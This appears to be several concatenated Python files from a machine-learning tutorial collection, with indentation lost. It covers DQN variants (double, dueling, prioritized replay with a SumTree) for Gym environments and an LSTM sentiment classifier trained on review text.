if len(self.replay_memory) < MIN_REPLAY_MEMORY_SIZE:
return
# Get a minibatch of random samples from memory replay table
minibatch = random.sample(self.replay_memory, MINIBATCH_SIZE)
# Get current states from minibatch, then query NN model for Q values
if self.state_in_image:
current_states = np.array([transition[0] for transition in minibatch])/255
else:
current_states = np.array([transition[0] for transition in minibatch])
current_qs_list = self.model.predict(np.expand_dims(current_states, axis=1))
# Get future states from minibatch, then query NN model for Q values
# When using target network, query it, otherwise main network should be queried
if self.state_in_image:
new_current_states = np.array([transition[3] for transition in minibatch])/255
else:
new_current_states = np.array([transition[3] for transition in minibatch])
future_qs_list = self.target_model.predict(np.expand_dims(new_current_states, axis=1))
X = []
y = []
# Now we need to enumerate our batches
for index, (current_state, action, reward, new_current_state, done) in enumerate(minibatch):
# If not a terminal state, get new q from future states, otherwise set it to 0
# almost like with Q Learning, but we use just part of equation here
if not done:
max_future_q = np.max(future_qs_list[index])
new_q = reward + DISCOUNT * max_future_q
else:
new_q = reward
# Update Q value for given state
current_qs = current_qs_list[index]
current_qs[action] = new_q
# And append to our training data
X.append(current_state)
y.append(current_qs)
# Fit on all samples as one batch, log only on terminal state
if self.state_in_image:
self.model.fit(np.array(X)/255, np.array(y), batch_size=MINIBATCH_SIZE, verbose=0, shuffle=False, callbacks=[self.tensorboard] if terminal_state else None)
else:
# self.model.fit(np.array(X), np.array(y), batch_size=MINIBATCH_SIZE, verbose=0, shuffle=False, callbacks=[self.tensorboard] if terminal_state else None)
self.model.fit(np.expand_dims(X, axis=1), np.array(y), batch_size=MINIBATCH_SIZE, verbose=0, shuffle=False, callbacks=[self.tensorboard] if terminal_state else None)
# Update target network counter every episode
if terminal_state:
self.target_update_counter += 1
# If counter reaches set value, update target network with weights of main network
if self.target_update_counter > UPDATE_TARGET_EVERY:
self.target_model.set_weights(self.model.get_weights())
self.target_update_counter = 0
# Queries main network for Q values given current observation space (environment state)
def get_qs(self, state):
if self.state_in_image:
return self.model.predict(np.array(state).reshape(-1, *state.shape)/255)[0]
else:
# return self.model.predict(np.array(state).reshape(1, env.n_states))[0]
return self.model.predict(np.array(state).reshape(1, 1, env.n_states))[0]
agent = DQNAgent(state_in_image=False)
print("Number of states:", env.n_states)
# agent.model.load_weights("models/2x32____22.00max___-2.44avg_-200.00min__1563463022.model")
# Iterate over episodes
for episode in tqdm(range(1, EPISODES + 1), ascii=True, unit='episodes'):
# Update tensorboard step every episode
agent.tensorboard.step = episode
# Restarting episode - reset episode reward and step number
episode_reward = 0
step = 1
# Reset environment and get initial state
current_state = env.reset()
# Reset flag and start iterating until episode ends
done = False
while not done:
# This part stays mostly the same, the change is to query a model for Q values
if np.random.random() > epsilon:
# Get action from Q table
action = np.argmax(agent.get_qs(current_state))
else:
# Get random action
action = np.random.randint(0, env.ACTION_SPACE_SIZE)
new_state, reward, done = env.step(action)
        # count the reward
episode_reward += reward
if SHOW_PREVIEW and not episode % AGGREGATE_STATS_EVERY:
env.render()
# Every step we update replay memory and train main network
agent.update_replay_memory((current_state, action, reward, new_state, done))
agent.train(done, step)
current_state = new_state
step += 1
# Append episode reward to a list and log stats (every given number of episodes)
ep_rewards.append(episode_reward)
if not episode % AGGREGATE_STATS_EVERY or episode == 1:
average_reward = sum(ep_rewards[-AGGREGATE_STATS_EVERY:])/len(ep_rewards[-AGGREGATE_STATS_EVERY:])
min_reward = min(ep_rewards[-AGGREGATE_STATS_EVERY:])
max_reward = max(ep_rewards[-AGGREGATE_STATS_EVERY:])
agent.tensorboard.update_stats(reward_avg=average_reward, reward_min=min_reward, reward_max=max_reward, epsilon=epsilon)
        # Save model, but only when the average reward is greater or equal to a set value
if average_reward >= -220:
agent.model.save(f'models/{MODEL_NAME}__{max_reward:_>7.2f}max_{average_reward:_>7.2f}avg_{min_reward:_>7.2f}min__{int(time.time())}.model')
# Decay epsilon
if epsilon > MIN_EPSILON:
epsilon *= EPSILON_DECAY
epsilon = max(MIN_EPSILON, epsilon)
agent.model.save(f'models/{MODEL_NAME}__{max_reward:_>7.2f}max_{average_reward:_>7.2f}avg_{min_reward:_>7.2f}min__{int(time.time())}.model')
# OpenGym Seaquest-v0
# -------------------
#
# This code demonstrates a Double DQN network with Priority Experience Replay
# in an OpenGym Seaquest-v0 environment.
#
# Made as part of blog series Let's make a DQN, available at:
# https://jaromiru.com/2016/11/07/lets-make-a-dqn-double-learning-and-prioritized-experience-replay/
#
# author: Jaromir Janisch, 2016
import matplotlib
import random, numpy, math, gym, scipy
import tensorflow as tf
import time
from SumTree import SumTree
from keras.callbacks import TensorBoard
from collections import deque
import tqdm
IMAGE_WIDTH = 84
IMAGE_HEIGHT = 84
IMAGE_STACK = 2
HUBER_LOSS_DELTA = 2.0
LEARNING_RATE = 0.00045
#-------------------- Modified Tensorboard -----------------------
class RLTensorBoard(TensorBoard):
def __init__(self, **kwargs):
"""
Overriding init to set initial step and writer (one log file for multiple .fit() calls)
"""
super().__init__(**kwargs)
self.step = 1
self.writer = tf.summary.FileWriter(self.log_dir)
def set_model(self, model):
"""
Overriding this method to stop creating default log writer
"""
pass
def on_epoch_end(self, epoch, logs=None):
"""
Overrided, saves logs with our step number
(if this is not overrided, every .fit() call will start from 0th step)
"""
self.update_stats(**logs)
def on_batch_end(self, batch, logs=None):
"""
Overrided, we train for one batch only, no need to save anything on batch end
"""
pass
def on_train_end(self, _):
"""
Overrided, we don't close the writer
"""
pass
def update_stats(self, **stats):
"""
Custom method for saving own metrics
Creates writer, writes custom metrics and closes writer
"""
self._write_logs(stats, self.step)
#-------------------- UTILITIES -----------------------
from keras import backend as K   # K.abs / K.square / K.mean are used by huber_loss below
def huber_loss(y_true, y_pred):
err = y_true - y_pred
cond = K.abs(err) < HUBER_LOSS_DELTA
L2 = 0.5 * K.square(err)
L1 = HUBER_LOSS_DELTA * (K.abs(err) - 0.5 * HUBER_LOSS_DELTA)
loss = tf.where(cond, L2, L1) # Keras does not cover where function in tensorflow :-(
return K.mean(loss)
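# Quick numeric illustration (a pure-numpy rewrite added for clarity only; training
# uses the Keras-backend version above). The Huber loss is quadratic for errors
# smaller than HUBER_LOSS_DELTA and linear beyond it, which caps the gradient coming
# from rare, badly wrong Q estimates.
def huber_loss_numpy(y_true, y_pred, delta=HUBER_LOSS_DELTA):
    err = numpy.abs(y_true - y_pred)
    return numpy.mean(numpy.where(err < delta,
                                  0.5 * numpy.square(err),
                                  delta * (err - 0.5 * delta)))

# e.g. huber_loss_numpy(numpy.array([0.0]), numpy.array([1.0]))   -> 0.5  (quadratic)
#      huber_loss_numpy(numpy.array([0.0]), numpy.array([10.0]))  -> 18.0 (linear)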
def processImage( img ):
rgb = scipy.misc.imresize(img, (IMAGE_WIDTH, IMAGE_HEIGHT), interp='bilinear')
r, g, b = rgb[:,:,0], rgb[:,:,1], rgb[:,:,2]
gray = 0.2989 * r + 0.5870 * g + 0.1140 * b # extract luminance
o = gray.astype('float32') / 128 - 1 # normalize
return o
#-------------------- BRAIN ---------------------------
from keras.models import Sequential
from keras.layers import *
from keras.optimizers import *
model_name = "conv2dx3"
class Brain:
def __init__(self, stateCnt, actionCnt):
self.stateCnt = stateCnt
self.actionCnt = actionCnt
self.model = self._createModel()
self.model_ = self._createModel() # target network
# custom tensorboard
self.tensorboard = RLTensorBoard(log_dir="logs/{}-{}".format(model_name, int(time.time())))
def _createModel(self):
model = Sequential()
model.add(Conv2D(32, (8, 8), strides=(4,4), activation='relu', input_shape=(self.stateCnt), data_format='channels_first'))
model.add(Conv2D(64, (4, 4), strides=(2,2), activation='relu'))
model.add(Conv2D(64, (3, 3), activation='relu'))
model.add(Flatten())
model.add(Dense(units=512, activation='relu'))
        model.add(Dense(units=self.actionCnt, activation='linear'))
opt = RMSprop(lr=LEARNING_RATE)
model.compile(loss=huber_loss, optimizer=opt)
return model
def train(self, x, y, epochs=1, verbose=0):
self.model.fit(x, y, batch_size=32, epochs=epochs, verbose=verbose, callbacks=[self.tensorboard])
def predict(self, s, target=False):
if target:
return self.model_.predict(s)
else:
return self.model.predict(s)
def predictOne(self, s, target=False):
return self.predict(s.reshape(1, IMAGE_STACK, IMAGE_WIDTH, IMAGE_HEIGHT), target).flatten()
def updateTargetModel(self):
self.model_.set_weights(self.model.get_weights())
#-------------------- MEMORY --------------------------
class Memory: # stored as ( s, a, r, s_ ) in SumTree
e = 0.01
a = 0.6
def __init__(self, capacity):
self.tree = SumTree(capacity)
def _getPriority(self, error):
return (error + self.e) ** self.a
def add(self, error, sample):
p = self._getPriority(error)
self.tree.add(p, sample)
def sample(self, n):
batch = []
segment = self.tree.total() / n
for i in range(n):
a = segment * i
b = segment * (i + 1)
s = random.uniform(a, b)
(idx, p, data) = self.tree.get(s)
batch.append( (idx, data) )
return batch
def update(self, idx, error):
p = self._getPriority(error)
self.tree.update(idx, p)
#-------------------- AGENT ---------------------------
MEMORY_CAPACITY = 50_000
BATCH_SIZE = 32
GAMMA = 0.95
MAX_EPSILON = 1
MIN_EPSILON = 0.05
EXPLORATION_STOP = 500_000 # at this step the decaying term of epsilon has shrunk to 1% of its range
LAMBDA = - math.log(0.01) / EXPLORATION_STOP # speed of decay
UPDATE_TARGET_FREQUENCY = 10_000
UPDATE_STATS_EVERY = 5
RENDER_EVERY = 50
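# Illustrative helper (added sketch, not used by the agent): epsilon decays exponentially
# from MAX_EPSILON toward MIN_EPSILON; after EXPLORATION_STOP steps the decaying term has
# shrunk to ~1% of its range, so epsilon is roughly 0.05 + 0.95 * 0.01 = 0.0595.
def _epsilon_at(step):
    return MIN_EPSILON + (MAX_EPSILON - MIN_EPSILON) * math.exp(-LAMBDA * step)
# e.g. _epsilon_at(0) == 1.0 and _epsilon_at(EXPLORATION_STOP) ~= 0.0595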
class Agent:
steps = 0
epsilon = MAX_EPSILON
def __init__(self, stateCnt, actionCnt, brain):
self.stateCnt = stateCnt
self.actionCnt = actionCnt
self.brain = brain
# self.memory = Memory(MEMORY_CAPACITY)
def act(self, s):
if random.random() < self.epsilon:
return random.randint(0, self.actionCnt-1)
else:
return numpy.argmax(self.brain.predictOne(s))
def observe(self, sample): # in (s, a, r, s_) format
x, y, errors = self._getTargets([(0, sample)])
self.memory.add(errors[0], sample)
if self.steps % UPDATE_TARGET_FREQUENCY == 0:
self.brain.updateTargetModel()
# slowly decrease epsilon based on the number of steps taken
self.steps += 1
self.epsilon = MIN_EPSILON + (MAX_EPSILON - MIN_EPSILON) * math.exp(-LAMBDA * self.steps)
def _getTargets(self, batch):
no_state = numpy.zeros(self.stateCnt)
states = numpy.array([ o[1][0] for o in batch ])
states_ = numpy.array([ (no_state if o[1][3] is None else o[1][3]) for o in batch ])
p = self.brain.predict(states)
p_ = self.brain.predict(states_, target=False)
pTarget_ = self.brain.predict(states_, target=True)
x = numpy.zeros((len(batch), IMAGE_STACK, IMAGE_WIDTH, IMAGE_HEIGHT))
y = numpy.zeros((len(batch), self.actionCnt))
errors = numpy.zeros(len(batch))
for i in range(len(batch)):
o = batch[i][1]
s = o[0]; a = o[1]; r = o[2]; s_ = o[3]
t = p[i]
oldVal = t[a]
if s_ is None:
t[a] = r
else:
t[a] = r + GAMMA * pTarget_[i][ numpy.argmax(p_[i]) ] # double DQN
x[i] = s
y[i] = t
errors[i] = abs(oldVal - t[a])
return (x, y, errors)
def replay(self):
batch = self.memory.sample(BATCH_SIZE)
x, y, errors = self._getTargets(batch)
# update errors
for i in range(len(batch)):
idx = batch[i][0]
self.memory.update(idx, errors[i])
self.brain.train(x, y)
class RandomAgent:
memory = Memory(MEMORY_CAPACITY)
exp = 0
epsilon = MAX_EPSILON
def __init__(self, actionCnt, brain):
self.actionCnt = actionCnt
self.brain = brain
def act(self, s):
return random.randint(0, self.actionCnt-1)
def observe(self, sample): # in (s, a, r, s_) format
error = abs(sample[2]) # reward
self.memory.add(error, sample)
self.exp += 1
def replay(self):
pass
#-------------------- ENVIRONMENT ---------------------
class Environment:
def __init__(self, problem):
self.problem = problem
self.env = gym.make(problem)
self.ep_rewards = deque(maxlen=UPDATE_STATS_EVERY)
def run(self, agent, step):
img = self.env.reset()
w = processImage(img)
s = numpy.array([w, w])
agent.brain.tensorboard.step = step
R = 0
while True:
if step % RENDER_EVERY == 0:
self.env.render()
a = agent.act(s)
img, r, done, info = self.env.step(a)
s_ = numpy.array([s[1], processImage(img)]) #last two screens
r = numpy.clip(r, -1, 1) # clip reward to [-1, 1]
if done: # terminal state
s_ = None
agent.observe( (s, a, r, s_) )
agent.replay()
s = s_
R += r
if done:
break
self.ep_rewards.append(R)
avg_reward = sum(self.ep_rewards) / len(self.ep_rewards)
if step % UPDATE_STATS_EVERY == 0:
min_reward = min(self.ep_rewards)
max_reward = max(self.ep_rewards)
agent.brain.tensorboard.update_stats(reward_avg=avg_reward, reward_min=min_reward, reward_max=max_reward, epsilon=agent.epsilon)
agent.brain.model.save(f"models/{model_name}-avg-{avg_reward:.2f}-min-{min_reward:.2f}-max-{max_reward:.2f}.h5")
# print("Total reward:", R)
return avg_reward
#-------------------- MAIN ----------------------------
PROBLEM = 'Seaquest-v0'
env = Environment(PROBLEM)
episodes = 2_000
stateCnt = (IMAGE_STACK, IMAGE_WIDTH, IMAGE_HEIGHT)
actionCnt = env.env.action_space.n
brain = Brain(stateCnt, actionCnt)
agent = Agent(stateCnt, actionCnt, brain)
randomAgent = RandomAgent(actionCnt, brain)
step = 0
try:
print("Initialization with random agent...")
while randomAgent.exp < MEMORY_CAPACITY:
step += 1
env.run(randomAgent, step)
print(randomAgent.exp, "/", MEMORY_CAPACITY)
agent.memory = randomAgent.memory
randomAgent = None
print("Starting learning")
for i in tqdm.tqdm(list(range(step+1, episodes+step+1))):
env.run(agent, i)
finally:
agent.brain.model.save("Seaquest-DQN-PER.h5")
import numpy as np
class SumTree:
"""
This SumTree code is modified version of Morvan Zhou:
https://github.com/MorvanZhou/Reinforcement-learning-with-tensorflow/blob/master/contents/5.2_Prioritized_Replay_DQN/RL_brain.py
"""
data_pointer = 0
def __init__(self, length):
# number of leaf nodes (final nodes that contain the experiences)
self.length = length
# generate the tree with all nodes' value = 0
# binary node (each node has max 2 children) so 2x size of leaf capacity - 1
# parent nodes = length - 1
# leaf nodes = length
self.tree = np.zeros(2*self.length - 1)
# contains the experiences
self.data = np.zeros(self.length, dtype=object)
def add(self, priority, data):
"""
Add priority score in the sumtree leaf and add the experience in data
"""
# look at what index we want to put the experience
tree_index = self.data_pointer + self.length - 1
#tree:
# 0
# / \
# 0 0
# / \ / \
#tree_index 0 0 0 We fill the leaves from left to right
self.data[self.data_pointer] = data
# update the leaf
self.update(tree_index, priority)
# increment data pointer
self.data_pointer += 1
# if we're above the capacity, we go back to the first index
if self.data_pointer >= self.length:
self.data_pointer = 0
def update(self, tree_index, priority):
"""
Update the leaf priority score and propagate the change through the tree
"""
# change = new priority score - former priority score
change = priority - self.tree[tree_index]
self.tree[tree_index] = priority
while tree_index != 0: # this method is faster than the recursive loop in the reference code
"""
Here we want to access the parent node, one level above the current one
THE NUMBERS IN THIS TREE ARE THE INDEXES NOT THE PRIORITY VALUES
0
/ \
1 2
/ \ / \
3 4 5 [6]
If we are at the leaf with index 6 and we have just updated its priority score,
we then need to update its parent node at index 2.
So tree_index = (tree_index - 1) // 2
tree_index = (6 - 1) // 2
tree_index = 2 (because // rounds the result down)
"""
tree_index = (tree_index - 1) // 2
self.tree[tree_index] += change
"""
Here we get the leaf_index, priority value of that leaf and experience associated with that index
"""
def get_leaf(self, v):
"""
Tree structure and array storage:
Tree index:
0 -> storing priority sum
/ \
1 2
/ \ / \
3 4 5 6 -> storing priority for experiences
Array type for storing:
[0,1,2,3,4,5,6]
"""
parent_index = 0
while True: # the while loop is faster than the method in the reference code
left_child_index = 2 * parent_index + 1
right_child_index = left_child_index + 1
# If we reach bottom, end the search
if left_child_index >= len(self.tree):
leaf_index = parent_index
break
else: # downward search, always search for a higher priority node
if v <= self.tree[left_child_index]:
parent_index = left_child_index
else:
v -= self.tree[left_child_index]
parent_index = right_child_index
data_index = leaf_index - self.length + 1
return leaf_index, self.tree[leaf_index], self.data[data_index]
@property
def total_priority(self):
return self.tree[0] # Returns the root node
class Memory:
# we use this to avoid some experiences having 0 probability of being picked
PER_e = 0.01
# we use this to make a tradeoff between taking only experiences with high priority
# and sampling randomly
PER_a = 0.6
# importance-sampling exponent, annealed from this value up to 1 over the course of training
PER_b = 0.4
PER_b_increment_per_sample = 0.001
absolute_error_upper = 1.0
def __init__(self, capacity):
# the tree is a sum tree whose leaves hold the priority scores, plus a data array that holds the experiences
# we don't use a deque here because that would shift every experience's index by one at each timestep
# we prefer a simple array that we overwrite once the memory is full
self.tree = SumTree(length=capacity)
def store(self, experience):
"""
Store a new experience in our tree
Each new experience has a score of max_priority (it will then be improved during training)
"""
# find the max priority
max_priority = np.max(self.tree.tree[-self.tree.length:])
# if the max priority is 0, we can't leave this experience at priority 0, since it would never be sampled
# so we use a minimum priority instead
if max_priority == 0:
max_priority = self.absolute_error_upper
# set the max p for new p
self.tree.add(max_priority, experience)
def sample(self, n):
"""
- First, to sample a minibatch of size k, the range [0, priority_total] is divided into k ranges.
- Then a value is uniformly sampled from each range.
- Next we search the sumtree for the experience whose priority segment the sampled value falls into.
- Finally, we calculate the importance-sampling (IS) weight for each minibatch element.
"""
# create a list that will contain the minibatch
memory = []
b_idx, b_is_weights = np.zeros((n, ), dtype=np.int32), np.zeros((n, 1), dtype=np.float32)
# calculate the priority segment
# here, as explained in the paper, we divide the range [0, ptotal] into n ranges
priority_segment = self.tree.total_priority / n
# increase b each time
self.PER_b = np.min([1., self.PER_b + self.PER_b_increment_per_sample])
# calculating the max weight
p_min = np.min(self.tree.tree[-self.tree.length:]) / self.tree.total_priority
max_weight = (p_min * n) ** (-self.PER_b)
for i in range(n):
a, b = priority_segment * i, priority_segment * (i + 1)
value = np.random.uniform(a, b)
# the experience that corresponds to each value is retrieved
index, priority, data = self.tree.get_leaf(value)
# P(j)
sampling_probs = priority / self.tree.total_priority
# IS = (1/N * 1/P(i))**b /max wi == (N*P(i))**-b /max wi
b_is_weights[i, 0] = np.power(n * sampling_probs, -self.PER_b)/ max_weight
b_idx[i]= index
experience = [data]
memory.append(experience)
return b_idx, memory, b_is_weights
def batch_update(self, tree_idx, abs_errors):
"""
Update the priorities on the tree
"""
abs_errors += self.PER_e
clipped_errors = np.minimum(abs_errors, self.absolute_error_upper)
ps = np.power(clipped_errors, self.PER_a)
for ti, p in zip(tree_idx, ps):
self.tree.update(ti, p)
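# Illustrative round trip through the prioritized replay buffer above (an added sketch with
# placeholder experience tuples; it is not called anywhere in the training code):
def _per_memory_demo():
    memory = Memory(capacity=8)
    for step in range(8):
        # the buffer stores whatever object it is given; this tuple format is just an example
        memory.store(("state", step % 4, float(step), "next_state", False))
    tree_idx, minibatch, is_weights = memory.sample(n=4)
    # pretend these are the new absolute TD errors for the sampled transitions
    memory.batch_update(tree_idx, np.array([0.5, 0.1, 0.9, 0.3]))
    return minibatch, is_weights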
import tensorflow as tf
class DDDQNNet:
""" Dueling Double Deep Q Neural Network """
def __init__(self, state_size, action_size, learning_rate, name):
self.state_size = state_size
self.action_size = action_size
self.learning_rate = learning_rate
self.name = name
# we use tf.variable_scope to know which network we're using (DQN or the Target net)
# it'll be helpful later when we update the target network's parameters (by copying the DQN parameters)
with tf.variable_scope(self.name):
# we create the placeholders
self.inputs_ = tf.placeholder(tf.float32, [None, *state_size], name="inputs")
self.is_weights_ = tf.placeholder(tf.float32, [None, 1], name="is_weights")
self.actions_ = tf.placeholder(tf.float32, [None, self.action_size], name="actions_")
# target Q
self.target_q = tf.placeholder(tf.float32, [None], name="target")
# neural net
self.dense1 = tf.layers.dense(inputs=self.inputs_,
units=32,
name="dense1",
kernel_initializer=tf.contrib.layers.xavier_initializer(),
activation="relu")
self.dense2 = tf.layers.dense(inputs=self.dense1,
units=32,
name="dense2",
kernel_initializer=tf.contrib.layers.xavier_initializer(),
activation="relu")
self.dense3 = tf.layers.dense(inputs=self.dense2,
units=32,
name="dense3",
kernel_initializer=tf.contrib.layers.xavier_initializer())
# here we separate into two streams (dueling)
# this one is the state-value function V(s)
self.value = tf.layers.dense(inputs=self.dense3,
units=1,
kernel_initializer=tf.contrib.layers.xavier_initializer(),
activation=None,
name="value"
)
# and this one is the advantage function A(s, a)
self.advantage = tf.layers.dense(inputs=self.dense3,
units=self.action_size,
activation=None,
kernel_initializer=tf.contrib.layers.xavier_initializer(),
name="advantage"
)
# aggregation
# Q(s, a) = V(s) + ( A(s, a) - 1/|A| * sum A(s, a') )
self.output = self.value + tf.subtract(self.advantage, tf.reduce_mean(self.advantage, axis=1, keepdims=True))
# Q is our predicted Q value
self.Q = tf.reduce_sum(tf.multiply(self.output, self.actions_), axis=1)
self.absolute_errors = tf.abs(self.target_q - self.Q)
# loss = IS_weights * (target_q - Q)**2
self.loss = tf.reduce_mean(self.is_weights_ * tf.squared_difference(self.target_q, self.Q))
self.optimizer = tf.train.RMSPropOptimizer(self.learning_rate).minimize(self.loss)
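# Minimal NumPy sketch of the dueling aggregation used above (illustrative only, not wired
# into the TensorFlow graph): Q(s, a) = V(s) + (A(s, a) - mean_a A(s, a)).
def _dueling_aggregate(value, advantage):
    # value: array of shape (batch, 1); advantage: array of shape (batch, n_actions)
    return value + (advantage - advantage.mean(axis=1, keepdims=True))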
import numpy
class SumTree:
write = 0
def __init__(self, capacity):
self.capacity = capacity
self.tree = numpy.zeros( 2*capacity - 1 )
self.data = numpy.zeros( capacity, dtype=object )
def _propagate(self, idx, change):
parent = (idx - 1) // 2
self.tree[parent] += change
if parent != 0:
self._propagate(parent, change)
def _retrieve(self, idx, s):
left = 2 * idx + 1
right = left + 1
if left >= len(self.tree):
return idx
if s <= self.tree[left]:
return self._retrieve(left, s)
else:
return self._retrieve(right, s-self.tree[left])
def total(self):
return self.tree[0]
def add(self, p, data):
idx = self.write + self.capacity - 1
self.data[self.write] = data
self.update(idx, p)
self.write += 1
if self.write >= self.capacity:
self.write = 0
def update(self, idx, p):
change = p - self.tree[idx]
self.tree[idx] = p
self._propagate(idx, change)
def get(self, s):
idx = self._retrieve(0, s)
dataIdx = idx - self.capacity + 1
return (idx, self.tree[idx], self.data[dataIdx])
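# Small illustrative usage of this SumTree (an added sketch, not part of the agent code):
# priorities drive proportional sampling through get().
def _sumtree_demo():
    tree = SumTree(capacity=4)
    for priority, item in [(1.0, "a"), (2.0, "b"), (3.0, "c")]:
        tree.add(priority, item)
    # total() is 6.0 here; any value in [0, 6) maps to a leaf in proportion to its priority
    idx, priority, data = tree.get(0.5 * tree.total())
    return idx, priority, data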
import numpy as np
from string import punctuation
from collections import Counter
from sklearn.model_selection import train_test_split
with open("data/reviews.txt") as f:
reviews = f.read()
with open("data/labels.txt") as f:
labels = f.read()
# remove all punctuations
all_text = ''.join([ c for c in reviews if c not in punctuation ])
reviews = all_text.split("\n")
reviews = [ review.strip() for review in reviews ]
all_text = ' '.join(reviews)
words = all_text.split()
print("Total words:", len(words))
# encoding the words
# dictionary that maps vocab words to integers here
vocab = sorted(set(words))
print("Unique words:", len(vocab))
# start at 1 because 0 is reserved for padding
vocab2int = {word: i for i, word in enumerate(vocab, start=1)}
# encoded reviews
encoded_reviews = []
for review in reviews:
encoded_reviews.append([vocab2int[word] for word in review.split()])
encoded_reviews = np.array(encoded_reviews)
# print("Number of reviews:", len(encoded_reviews))
# encode the labels, 1 for 'positive' and 0 for 'negative'
labels = labels.split("\n")
labels = [1 if label == 'positive' else 0 for label in labels]
# print("Number of labels:", len(labels))
review_lens = [len(x) for x in encoded_reviews]
counter_reviews_lens = Counter(review_lens)
# remove any reviews with 0 length
cleaned_encoded_reviews, cleaned_labels = [], []
for review, label in zip(encoded_reviews, labels):
if len(review) != 0:
cleaned_encoded_reviews.append(review)
cleaned_labels.append(label)
encoded_reviews = np.array(cleaned_encoded_reviews)
labels = cleaned_labels
# print("Number of reviews:", len(encoded_reviews))
# print("Number of labels:", len(labels))
sequence_length = 200
features = np.zeros((len(encoded_reviews), sequence_length), dtype=int)
for i, review in enumerate(encoded_reviews):
features[i, -len(review):] = review[:sequence_length]
# print(features[:10, :100])
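# Illustrative example of the left-padding above (assumed toy values, not from the real
# data): with sequence_length = 5, an encoded review [7, 2, 9] becomes [0, 0, 7, 2, 9],
# while a review longer than 5 tokens keeps only its first 5 tokens.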
# split data into train, validation and test
split_frac = 0.9
X_train, X_test, y_train, y_test = train_test_split(features, labels, test_size=1-split_frac)
X_test, X_validation, y_test, y_validation = train_test_split(X_test, y_test, test_size=0.5)
print(f"""Features shapes:
Train set: {X_train.shape}
Validation set: {X_validation.shape}
Test set: {X_test.shape}""")
print("Example:")
print(X_train[0])
print(y_train[0])
# X_train, X_validation = features[:split_frac*len(features)], features[split_frac*len(features):]
# y_train, y_validation = labels[:split]
import tensorflow as tf
from utils import get_batches
from train import *
import tensorflow as tf
from preprocess import vocab2int, X_train, y_train, X_validation, y_validation, X_test, y_test
from utils import get_batches
import numpy as np
def get_lstm_cell():
# basic LSTM cell
lstm = tf.contrib.rnn.BasicLSTMCell(lstm_size)
# dropout to the cell
drop = tf.contrib.rnn.DropoutWrapper(lstm, output_keep_prob=keep_prob)
return drop
# RNN parameters
lstm_size = 256
lstm_layers = 1
batch_size = 256
learning_rate = 0.001
n_words = len(vocab2int) + 1 # Added 1 for the 0 that is for padding
# create the graph object
graph = tf.Graph()
# add nodes to the graph
with graph.as_default():
inputs = tf.placeholder(tf.int32, (None, None), "inputs")
labels = tf.placeholder(tf.int32, (None, None), "labels")
keep_prob = tf.placeholder(tf.float32, name="keep_prob")
# number of units in the embedding layer
embedding_size = 300
with graph.as_default():
# embedding lookup matrix
embedding = tf.Variable(tf.random_uniform((n_words, embedding_size), -1, 1))
# pass to the LSTM cells
embed = tf.nn.embedding_lookup(embedding, inputs)
# stackup multiple LSTM layers
cell = tf.contrib.rnn.MultiRNNCell([get_lstm_cell() for i in range(lstm_layers)])
initial_state = cell.zero_state(batch_size, tf.float32)
# pass cell and input to cell, returns outputs for each time step
# and the final state of the hidden layer
# run the data through the rnn nodes
outputs, final_state = tf.nn.dynamic_rnn(cell, embed, initial_state=initial_state)
# grab the last output
# use sigmoid for binary classification
predictions = tf.contrib.layers.fully_connected(outputs[:, -1], 1, activation_fn=tf.sigmoid)
# calculate cost using MSE
cost = tf.losses.mean_squared_error(labels, predictions)
optimizer = tf.train.AdamOptimizer(learning_rate).minimize(cost)
# nodes to calculate the accuracy
correct_pred = tf.equal(tf.cast(tf.round(predictions), tf.int32), labels)
accuracy = tf.reduce_mean(tf.cast(correct_pred, tf.float32))
saver = tf.train.Saver()
########### training ##########
epochs = 10
with tf.Session(graph=graph) as sess:
sess.run(tf.global_variables_initializer())
iteration = 1
for e in range(epochs):
state = sess.run(initial_state)
for i, (x, y) in enumerate(get_batches(X_train, y_train, batch_size=batch_size)):
y = np.array(y)
x = np.array(x)
feed = {inputs: x, labels: y[:, None],
keep_prob: 0.5,
initial_state: state}
loss, state, _ = sess.run([cost, final_state, optimizer], feed_dict=feed)
if iteration % 5 == 0:
print(f"[Epoch: {e}/{epochs}] Iteration: {iteration} Train loss: {loss:.3f}")
if iteration % 25 == 0:
val_acc = []
val_state = sess.run(cell.zero_state(batch_size, tf.float32))
for x, y in get_batches(X_validation, y_validation, batch_size=batch_size):
x, y = np.array(x), np.array(y)
feed = {inputs: x, labels: y[:, None],
keep_prob: 1, initial_state: val_state}
batch_acc, val_state = sess.run([accuracy, final_state], feed_dict=feed)
val_acc.append(batch_acc)
print(f"val_acc: {np.mean(val_acc):.3f}")
iteration += 1
saver.save(sess, "chechpoints/sentiment1.ckpt")
test_acc = []
with tf.Session(graph=graph) as sess:
saver = tf.train.Saver()
saver.restore(sess, tf.train.latest_checkpoint('checkpoints'))
test_state = sess.run(cell.zero_state(batch_size, tf.float32))
for ii, (x, y) in enumerate(get_batches(X_test, y_test, batch_size), 1):
feed = {inputs: x,
labels: y[:, None],
keep_prob: 1,
initial_state: test_state}
batch_acc, test_state = sess.run([accuracy, final_state], feed_dict=feed)
test_acc.append(batch_acc)
print("Test accuracy: {:.3f}".format(np.mean(test_acc)))
def get_batches(x, y, batch_size=100):
n_batches = len(x) // batch_size
x, y = x[:n_batches*batch_size], y[:n_batches*batch_size]
for i in range(0, len(x), batch_size):
yield x[i: i+batch_size], y[i: i+batch_size]
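# Illustrative usage of get_batches (an added sketch, not part of the training code):
# with 10 items and batch_size=4, only two full batches are yielded and the remainder is dropped.
def _get_batches_demo():
    xs = list(range(10))
    ys = [2 * v for v in xs]
    return list(get_batches(xs, ys, batch_size=4))  # -> [([0..3], [0,2,4,6]), ([4..7], [8,10,12,14])]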
import numpy as np
import pandas as pd
import tqdm
from string import punctuation
punc = set(punctuation)
df = pd.read_csv(r"E:\datasets\sentiment\food_reviews\amazon-fine-food-reviews\Reviews.csv")
X = np.zeros((len(df), 2), dtype=object)
for i in tqdm.tqdm(range(len(df)), "Cleaning X"):
target = df['Text'].loc[i]
# X.append(''.join([ c.lower() for c in target if c not in punc ]))
X[i, 0] = ''.join([ c.lower() for c in target if c not in punc ])
X[i, 1] = df['Score'].loc[i]
pd.DataFrame(X, columns=["Text", "Score"]).to_csv("data/Reviews.csv")
### Model Architecture hyper parameters
embedding_size = 64
# sequence_length = 500
sequence_length = 42
LSTM_units = 128
### Training parameters
batch_size = 128
epochs = 20
### Preprocessing parameters
# words that occur fewer than N times will be deleted from the dataset
N = 10
# test size in ratio, train size is 1 - test_size
test_size = 0.15
from keras.models import Sequential
from keras.layers import Embedding, LSTM, Dense, Activation, LeakyReLU, Dropout, TimeDistributed
from keras.layers import SpatialDropout1D
from config import LSTM_units
def get_model_binary(vocab_size, sequence_length):
embedding_size = 64
